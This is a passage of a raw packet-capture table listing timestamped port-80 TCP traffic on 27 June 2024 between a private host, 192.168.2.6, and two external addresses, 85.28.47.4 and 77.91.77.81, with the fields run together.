                                                                Jun 27, 2024 05:58:13.230393887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230406046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230406046 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230417013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230427980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230433941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230439901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230451107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230458021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230463028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230474949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230478048 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230495930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230511904 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.231134892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231148005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231159925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231170893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231172085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.231183052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231189013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.231194973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231209040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231215954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.231220961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231229067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.231231928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231245041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.231257915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.231282949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.352899075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.353001118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.886678934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.886718035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.891747952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.891762018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:14.609411001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:14.609468937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:14.665220022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:14.670224905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:14.841375113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:14.841398954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:14.841408968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:14.841469049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:14.841514111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:14.843990088 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:14.849375010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:15.020627975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:15.020730972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:15.037130117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:15.042013884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:15.734996080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:15.735074043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:15.762976885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:15.767951965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:16.469623089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:16.469784021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:16.472975969 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:16.477879047 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:16.477950096 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:16.478039980 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:16.482801914 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171430111 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171447039 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171464920 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171477079 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171489000 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171500921 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171514034 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171533108 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.171564102 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171587944 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.171608925 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.171623945 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171636105 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.171659946 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.171690941 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.178066015 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.178128004 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.178138971 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.178212881 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.178225994 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.178272009 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.304477930 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.304497957 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.304508924 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.304586887 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.304649115 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.304658890 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.304685116 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.304709911 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.304806948 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.304845095 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.304970026 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.304980993 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.305006027 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.305016994 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.305113077 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.305123091 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.305162907 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.305171013 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.305773020 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.305922985 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.305953026 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.305963993 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.305994034 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.306015968 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.306133032 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.306143999 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.306175947 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.306193113 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.306762934 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.306773901 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.306785107 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.306808949 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.306821108 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.306899071 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.306931973 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.307070017 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.307116032 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.307764053 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.307775974 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.307786942 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.307813883 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.307835102 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.307908058 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.307945967 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.422732115 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.422748089 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.422764063 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.422775030 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.422785997 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.422796965 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.422807932 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.422847986 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.422899961 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.422914028 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.422955036 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.423536062 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.423589945 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.423609972 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.423648119 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.423660994 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.423702002 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.423893929 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.423940897 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.423952103 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.423990965 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.424021959 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.424067020 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.424077988 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.424084902 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.424108028 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.424124956 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.424810886 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.424854994 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.424910069 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.424923897 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.424947977 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.424962044 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425020933 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425031900 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425041914 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425056934 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425069094 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425103903 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425689936 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425734997 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425753117 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425765038 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425784111 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425800085 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425858974 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425869942 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425879955 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.425889015 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425904989 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.425920010 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.426618099 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.426661015 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.426681042 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.426692009 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.426722050 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.426738024 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.426811934 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.426821947 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.426834106 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.426841974 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.426862955 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.427551985 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.427594900 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.427618027 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.427654982 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.509836912 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.509860992 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.509872913 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.509941101 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.509984016 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.509994984 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.510004997 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.510013103 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.510020971 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.510030985 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.510051012 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.510072947 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.510169029 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.510179043 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.510190964 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.510202885 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.510222912 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.510293961 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.510329008 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.510353088 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.510385990 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.548788071 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.548801899 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.548844099 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.548858881 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549047947 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549093008 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549113035 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549124956 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549160004 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549333096 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549345970 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549356937 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549369097 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549387932 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549406052 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549498081 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549541950 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549562931 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549575090 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549601078 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549618006 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549683094 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549694061 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549705029 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549717903 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549727917 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549756050 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549861908 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549904108 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.549936056 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549948931 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.549985886 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.550323009 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550364971 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.550385952 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550398111 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550422907 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.550441027 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.550507069 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550518990 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550530910 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550556898 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.550580025 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.550673962 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550685883 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550694942 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550719023 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.550739050 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.550790071 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.550833941 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.552778006 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.552791119 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.552828074 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.552846909 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.552856922 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.552867889 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.552881002 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.552890062 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.552906990 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.552930117 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553124905 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553137064 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553148031 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553158998 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553169966 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553179026 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553190947 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553198099 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553208113 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553215981 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553225040 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553239107 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553246975 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553270102 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553495884 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553535938 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553550005 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553560972 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553571939 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553586006 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553591967 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553603888 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553628922 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553725958 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553774118 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553795099 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553807020 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553841114 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553894997 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553905964 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553917885 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553930044 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.553946972 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553957939 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.553996086 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.554016113 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.554059029 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.556830883 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.556843042 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.556854010 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.556885958 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.556905031 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.596621037 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.596647024 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.596659899 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.596720934 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.596743107 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.596781969 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.596793890 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.596805096 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.596817970 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.596823931 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.596863985 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.596873999 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.596927881 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.596968889 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.596990108 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.597006083 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.597018003 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.597028017 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.597038031 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.597044945 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.597054958 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.597074986 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.597122908 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.597162962 CEST4971480192.168.2.677.91.77.81
